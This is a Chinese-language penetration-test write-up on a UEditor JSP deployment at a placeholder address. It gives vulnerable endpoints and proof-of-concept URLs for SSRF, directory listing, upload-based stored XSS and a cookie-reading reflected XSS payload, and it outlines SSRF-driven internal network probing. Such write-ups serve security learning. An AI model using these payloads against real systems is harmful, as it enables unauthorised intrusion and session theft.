(已知目标ip为1.1.1.1)
使用fofa看看有哪些web服务:
我一般会习惯性的F12、刷新看看网站会加载哪些资源(总会出现一些奇妙的路径)
如图:
ueditor+jsp
SSRF
目录遍历
文件上传 => Stored XSS
反射型XSS
首先确定ueditor的版本
阅读js源码发现,可以在控制台通过UE.version获得editor的版本
console.log(UE.version)
SSRF
已知该版本ueditor的ssrf触发点:
/jsp/controller.jsp?action=catchimage&source[]=/jsp/getRemoteImage.jsp?upfile=/php/controller.php?action=catchimage&source[]=
使用百度logo构造poc:
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png
成功,ssrf一枚!
对于后续利用姿势:
内网探测
应用识别
漏洞利用
......
简单叙述一下扩大战果的思路:
进行内网探测,查看内网开放的主机和端口。然后通过访问开放的端口返回的一些特征去识别在该服务器上部署的服务与应用,最后针对性地采用一些payload去判断是否存在漏洞。
这里附上ssrf内网探测的脚本:
(来源:猎户攻防实验室)
文件上传 => Stored XSS
已知其上传路径为:
/asp/controller.asp?action=uploadimage /asp/controller.asp?action=uploadfile/net/controller.ashx?action=uploadimage /net/controller.ashx?action=uploadfile/php/controller.php?action=uploadfile /php/controller.php?action=uploadimage/jsp/controller.jsp?action=uploadfile /jsp/controller.jsp?action=uploadimag
xml xss poc:
文件遍历:
已知该版本ueditor的文件遍历触发点:
/jsp/controller.jsp?action=listimage/jsp/controller.jsp?action=listfile/net/controller.ashx?action=listimage/net/controller.ashx?action=listfile...
根据漏洞触发点构造poc:
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listfile
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listimage
XSS
已知该洞的触发点:
/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx
# poc# myEditor中的’ E ’必须大写,小写无效。post myEditor=<script>alert(document.cookie)</script>
由于目标站点不存在该文件:
所以我在网上找了一处案例来演示一番:
(图自:https://blog.csdn.net/yun2diao/)
###分割线
希望自己在每一次的复盘中都能有所收获。
在我看来,学习的目的并不是为了证明你学到了什么,而是在每一次的学习/工作中去发现自己还有哪些技能/知识没有掌握,然后去跟进学习。
